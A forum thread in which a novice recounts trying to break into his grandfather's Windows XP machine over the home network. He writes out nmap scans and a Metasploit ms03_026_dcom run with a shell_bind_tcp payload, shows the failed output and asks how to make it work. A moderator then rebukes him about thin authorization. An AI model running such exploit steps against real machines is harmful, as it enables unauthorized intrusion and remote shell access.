Thread: Metasploit Question - ms03_026_dcom - shell_bind_tcp

  1. #1
    Junior Member
    Join Date
    Mar 2008
    Posts
    94

    Question Metasploit Question - ms03_026_dcom - shell_bind_tcp

    Alright. I finally had some free time today. My grandfather wanted me to put some work into a project that I have been working on for his company (an inventory Access database). Usually I just go into his office (he always leaves his computer logged on) and copy it to a flash drive and move it over to my XP box and do the work.

    But today I was tired and feeling very lazy lol. I wanted to send it over the network. To my dismay I haven't set up any type of SMB shares or an SFTP/SCP system like I have done at my house (I SFTP my files over the internet when I need something). So I started thinking... "What's another way I could pull it over the network...?" And then it hit me! Hack it! (Maybe not the most conventional method.)

    After doing a little research I figured out that I assume Metasploit would be the answer. I've never worked with Metasploit before, so I thought this would be a good and worthwhile opportunity. I told my grandfather what I was planning and he said "Fine, but if you break anything, you better fix it by the time I need to get on there again." That's what he says about everything lol.

    After googling my eyes out and making notes in Notepad, I downloaded Metasploit and updated it (version 3.4.2). I'm not really sure what I'm doing and am kinda playing it by ear, so if anyone has any improvements, please speak up.

    My specs: I'm running a wireless Windows XP SP3 fully patched box with the firewall off for testing. He's running a wired Windows XP SP3 box with the firewall on and eh... maybe updates a week or so old (I think Automatic Windows Update is enabled). We are the only computers on the network (maybe a VM occasionally). Our IP scheme is 192.168.1.1/24. The router is an old 100Mbit 802.11b Linksys running standard Linksys firmware. Internet is a dynamic IP Comcast cable modem (cheapest plan).

    I made sure he was on the network and brought up my rough notes and got to work.

    I loaded up Windows and a Command Prompt, ran nmap and did a:

    Code:
    nmap -sP 192.168.1.1/24
    This produced the 3 hosts:
    - Me (192.168.1.100)
    - Mr. Linksys Router (192.168.1.1)
    - Grandfather's Computer (192.168.1.102)
    (Not sure what happened to 192.168.1.101.)


    I did an ipconfig in another window and confirmed my IP (192.168.1.100). Alright, sounds like 192.168.1.102 is my target. Then I decided to do a port scan:

    Code:
    nmap -sT 192.168.1.102
    It said that:
    - 999 filtered ports
    - 139/tcp - open - netbios-ssn


    Ok. I think I have enough information for the attack: the IP and a port to attack. I think that's the info I need?

    I fired up Metasploit and started to run commands. The most popular exploit I could find in the hour or so of searching was the RPC DCOM exploit. It says XP compatible so I decided to try it:

    Code:
    use exploit/windows/dcerpc/ms03_026_dcom
    It took it ok. Good. Then I ran the next command:

    Code:
    show options
    It said I needed to set 2 properties: RHOST for the host and RPORT for the port. I got this info using nmap. I set these 2 values:

    Code:
    set RHOST 192.168.1.102
    set RPORT 139
    I'm not sure about a payload... I picked a popular one I had read about randomly:

    Code:
    set PAYLOAD windows/shell_bind_tcp
    I tried check but it said it was not supported... oh well.

    I ran another nmap scan to make sure everything was still the same, it was.

    Then I launched the exploit.

    Code:
    exploit
    And got some interesting feedback:

    Code:
    [*] Started bind handler
    [*] trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:1.1@ncacn_ip_tcp:192.168.1.102[139] ...
    [-] Exploit exception: Invalid packet. DCERPC response packet is incomplete
    [*] Exploit completed, but no session was created.


    I'm guessing it did not work??? Does that mean his computer is patched? Or did I do something wrong? Are there any tweaks that would make it work?

    I'm going to research it a bit more and maybe play with different payloads. I'm guessing his system is patched. It was a fun experiment, but in the end... back to the flash drive.

    I figure progress was made; I figured out what does not work.

    Quote Originally Posted by cybrsnpr
    I think you have the right idea, but I also think you are really trying to kill a gnat with a small nuclear device!

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Metasploit Question - ms03_026_dcom - shell_bind_tcp

    Quote Originally Posted by >Dart>
    My grandfather wanted me to put some work into a project that I have been working on for his company (an inventory Access database). Usually I just go into his office (he always leaves his computer logged on) and copy it to a flash drive and move it over to my XP box and do the work.
    But today I was tired and feeling very lazy lol. I wanted to send it over the network. To my dismay I haven't set up any type of SMB shares or an SFTP/SCP system like I have done at my house (I SFTP my files over the internet when I need something). So I started thinking... "What's another way I could pull it over the network...?" And then it hit me! Hack it! (Maybe not the most conventional method.)
    After doing a little research I figured out that I assume Metasploit would be the answer. I've never worked with Metasploit before, so I thought this would be a good and worthwhile opportunity. I told my grandfather what I was planning and he said "Fine, but if you break anything, you better fix it by the time I need to get on there again." That's what he says about everything lol.
    After googling my eyes out and making notes in Notepad, I downloaded Metasploit and updated it (version 3.4.2). I'm not really sure what I'm doing and am kinda playing it by ear, so if anyone has any improvements, please speak up.


    I mean really? You have been here long enough to know the rules, and the types of posts we tolerate. It looks to me like you should leave grandpa's computer alone. I mean "That's what he says about everything lol", come on man.

    Not only that, but there is no need to download Metasploit since it is already included in BT, and we don't support your OS here.
    To be successful here you should read all of the following:
    - Forum Rules
    - Forum FAQ
    - If you are new to Back|Track
    - Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.
